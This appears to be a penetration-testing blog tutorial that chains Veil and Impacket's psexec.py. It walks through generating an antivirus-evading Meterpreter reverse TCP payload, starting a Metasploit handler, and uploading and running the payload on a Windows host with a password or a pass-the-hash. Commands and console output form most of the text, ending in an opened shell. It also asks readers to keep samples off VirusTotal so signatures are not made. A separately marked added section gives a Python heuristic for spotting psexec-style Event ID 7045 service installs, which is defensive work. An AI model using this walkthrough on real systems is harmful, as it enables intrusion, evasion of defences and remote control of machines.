Veil + psexec.py = pwnage


Before I begin, please do not upload any payloads referenced in this tutorial to sites like VirusTotal. Antivirus companies use these samples to create new signatures for their products. OK, on to it.

First of all, Veil is a nice little payload generator that will generate your Windows payload all within Kali. It was created by Chris Truncer using some of the antivirus bypass techniques shared by Dave Kennedy and Debasish Mandal. Chris already has a nice tutorial on how to get set up and running. I’ve been using Option 7 to generate payloads, which seems to bypass Microsoft Security Essentials just fine.

Finally, you can use CoreLabs’ Python version of psexec to execute your payload on a remote machine. To install, simply download the latest version of Impacket and run setup.py.

root@kali:~# wget http://impacket.googlecode.com/files/impacket-0.9.10.tar.gz
root@kali:~# tar -xzvf impacket-0.9.10.tar.gz
root@kali:~# cd impacket-0.9.10/
root@kali:~/impacket-0.9.10# python setup.py install

Let’s walk through a quick example of using both of these tools.

First, we generate a payload:

root@kali:/opt/Veil# python Veil.py 

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What payload type would you like to use?

 1 - Meterpreter - Python - void pointer
 2 - Meterpreter - Python - VirtualAlloc()
 3 - Meterpreter - Python - base64 Encoded
 4 - Meterpreter - Python - Letter Substitution
 5 - Meterpreter - Python - ARC4 Stream Cipher
 6 - Meterpreter - Python - DES Encrypted
 7 - Meterpreter - Python - AES Encrypted
 8 - Meterpreter - C - void pointer
 9 - Meterpreter - C - VirtualAlloc()
 0 - Exit Veil

[>] Please enter the number of your choice: 7

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] Use msfvenom or supply custom shellcode?

 1 - msfvenom (default)
 2 - Custom

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What type of payload would you like?

 1 - Reverse TCP
 2 - Reverse HTTP
 3 - Reverse HTTPS
 0 - Main Menu

[>] Please enter the number of your choice: 1
[?] What's the Local Host IP Address: 192.168.81.201
[?] What's the Local Port Number: 443
[*] Generating shellcode...

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] How would you like to create your payload executable?

 1 - Pyinstaller (default)
 2 - Py2Exe

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[!] Be sure to set up a Reverse TCP handler with the following settings:

 PAYLOAD = windows/meterpreter/reverse_tcp
 LHOST   = 192.168.81.201
 LPORT   = 443

[!] Your payload files have been generated, don't get caught!

root@kali:/opt/Veil# mv payload.exe TrustedSec.exe

Next, we start a multi/handler with “smart_migrate” enabled:

msf exploit(handler) > resource /root/scripts/msf/multi_handler/reverse_tcp.rc 
[*] Processing /root/scripts/msf/multi_handler/reverse_tcp.rc for ERB directives.
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> use multi/handler
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set LPORT 443
LPORT => 443
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> set AutoRunScript post/windows/manage/smart_migrate
AutoRunScript => post/windows/manage/smart_migrate
resource (/root/scripts/msf/multi_handler/reverse_tcp.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443 
[*] Starting the payload handler...

Now, we can use “psexec.py” to upload and execute our payload using username/password or username/hash:

Username/password example:
psexec.py TrustedSec:'InformationSecurityMadeSimple!'@192.168.81.129 cmd.exe

Username/hash example:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537 <username>@<target IP> cmd.exe

Psexec session:

Impacket v0.9.10 - Copyright 2002-2013 Core Security Technologies
Trying protocol 445/SMB...
[*] Requesting shares on 192.168.81.139.....
[*] Found writable share ADMIN$
[*] Uploading file KDgwQrZj.exe
[*] Opening SVCManager on 192.168.81.139.....
[*] Creating service rWGK on 192.168.81.139.....
[*] Starting service rWGK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>put TrustedSec.exe
[*] Uploading TrustedSec.exe to ADMIN$\/
C:\Windows\system32>start TrustedSec.exe
C:\Windows\system32>del ..\\TrustedSec.exe
C:\Windows\system32>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 192.168.81.139.....
[*] Stoping service rWGK.....
[*] Removing service rWGK.....
[*] Removing file KDgwQrZj.exe.....
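The session above shows the footprint psexec.py leaves on the target: a randomly named executable written to the root of ADMIN$ (which maps to the Windows directory) and a short randomly named service created and started through the Service Control Manager, which Windows records in the System log as Event ID 7045 ("A service was installed in the system"). As an added example that is not part of the original post, here is a small Python heuristic that flags that pattern in a set of constructed 7045 records; the reduced record layout (EventID, ServiceName, ImagePath, StartType) is an assumption modelled on the event's fields.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample System-log records (Event ID 7045), reduced to the fields
# the heuristic needs. These are made-up records, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "1", "EventID": "7045", "ServiceName": "rWGK",
     "ImagePath": "%SystemRoot%\\KDgwQrZj.exe", "StartType": "demand start"},
    {"id": "2", "EventID": "7045", "ServiceName": "Spooler",
     "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe", "StartType": "auto start"},
    {"id": "3", "EventID": "7045", "ServiceName": "MyBackupAgent",
     "ImagePath": "C:\\Program Files\\Backup\\agent.exe", "StartType": "auto start"},
    # Same service name but a different event (7036, state change): not a match.
    {"id": "4", "EventID": "7036", "ServiceName": "rWGK",
     "ImagePath": "", "StartType": ""},
]

# In the session above psexec.py used a 4-letter service name ("rWGK") and an
# 8-letter binary ("KDgwQrZj.exe") dropped directly under the Windows directory.
SERVICE_NAME_RE = re.compile(r"^[A-Za-z]{4}$")
IMAGE_PATH_RE = re.compile(
    r"^(?:%SystemRoot%|C:\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def looks_like_psexec(event: Dict[str, str]) -> bool:
    """True when a 7045 record shows a random short service name whose binary
    sits at the root of the Windows directory with a random 8-letter name."""
    if event.get("EventID") != "7045":
        return False
    name_ok = SERVICE_NAME_RE.match(event.get("ServiceName", ""))
    path_ok = IMAGE_PATH_RE.match(event.get("ImagePath", ""))
    return bool(name_ok and path_ok)


def flag_psexec_like(events: Iterable[Dict[str, str]]) -> List[str]:
    """Return the ids of the records that match the heuristic."""
    return [e["id"] for e in events if looks_like_psexec(e)]


if __name__ == "__main__":
    for event_id in flag_psexec_like(SAMPLE_EVENTS):
        print("possible remote service execution, event", event_id)
```

Service names and binaries are short-lived here (the session stops and removes both on exit), so the 7045 record is often the only durable trace; pairing it with SMB share-access auditing on ADMIN$ tightens the match.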

Reap the shellz:

[*] Sending stage (751104 bytes) to 192.168.81.129
[*] Meterpreter session 1 opened (192.168.81.201:443 -> 192.168.81.129:1038) at 2013-06-09 19:57:17 -0400
[*] Session ID 1 (192.168.81.201:443 -> 192.168.81.129:1038) processing AutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: TrustedSec.exe (1436)
[+] Migrating to 632
[+] Successfully migrated to process

BooYah!!!
